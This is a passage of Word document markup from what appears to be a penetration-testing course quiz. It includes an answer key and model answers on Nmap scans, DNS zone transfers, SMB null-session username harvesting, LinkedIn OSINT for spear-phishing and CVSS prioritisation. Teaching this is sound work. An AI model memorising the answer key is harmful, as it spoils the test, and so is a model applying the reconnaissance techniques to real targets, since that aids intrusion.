        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> nvd.nist.gov</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A Google dork result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> An anonymous forum post</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is the main reason manual verification of scanner findings matters?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanners never find real vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanner output is always 100% accurate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanners can produce false positives that waste remediation effort if unverified</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manual verification is required by Nmap's license</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer Key</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975"/>
        <w:gridCol w:w="975"/>
        <w:gridCol w:w="7796"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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Q#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Shodan queries an existing database, so no packet reaches the target — this is passive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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-sT uses the OS socket API and completes the handshake, unlike the half-open -sS scan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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AXFR hands over the whole zone file, exposing hostnames that would otherwise take many guesses to find.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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User Interaction (UI) specifically measures whether victim action is required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Null-session SMB enumeration is a classic way to harvest valid usernames for later attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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-T0 (paranoid) is the slowest and least likely to trigger detection; -T5 is fastest and most detectable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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--script=vuln actively probes for vulnerabilities rather than passively gathering default information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Context (exposure, exploitability) should inform remediation priority, while the finding is still documented and tracked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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The National Vulnerability Database (NVD) is the authoritative, official CVE/CVSS source.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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False positives are common enough that unverified critical/high findings risk damaging report credibility and wasting client effort.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-Answer Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why is a successful DNS zone transfer considered a security risk?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">It discloses the complete DNS zone — every subdomain and internal hostname — in a single request, giving an attacker a ready-made map of the organisation's infrastructure that would otherwise require extensive guessing to assemble.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> From LinkedIn OSINT results, what information could an attacker use for a spear-phishing attack?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Job titles, team names, manager relationships, and technologies or projects mentioned in posts let an attacker craft a personalised, believable pretext — for example impersonating IT support about a specific internal tool, which is far more convincing than a generic phishing email.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Does a Nessus finding of CVSS 9.8 automatically make it the top remediation priority? What other factors matter?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">No. CVSS reflects theoretical severity, not confirmed exploitability on this specific target. Exposure (internet-facing vs internal), whether the finding was manually verified, compensating controls already in place, and the business value of the affected asset must all be weighed alongside the raw score.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is the difference between a vulnerability scan and a penetration test?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A vulnerability scan is automated and broad, producing a list of potential weaknesses without exploiting them. A penetration test is manual and targeted, actively exploiting selected weaknesses to prove real, demonstrable business impact through a proof of concept.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explain the difference between TCP SYN scan (-sS) and TCP Connect scan (-sT).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">-sS sends only a SYN packet and reads the response (SYN/ACK = open) without completing the handshake, making it faster and less likely to be logged as a full connection, but it requires raw-socket (root) privileges. -sT completes the full three-way handshake via the OS socket API, works without special privileges, but is slower and more likely to appear in application-level logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-Answer / Descriptive Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
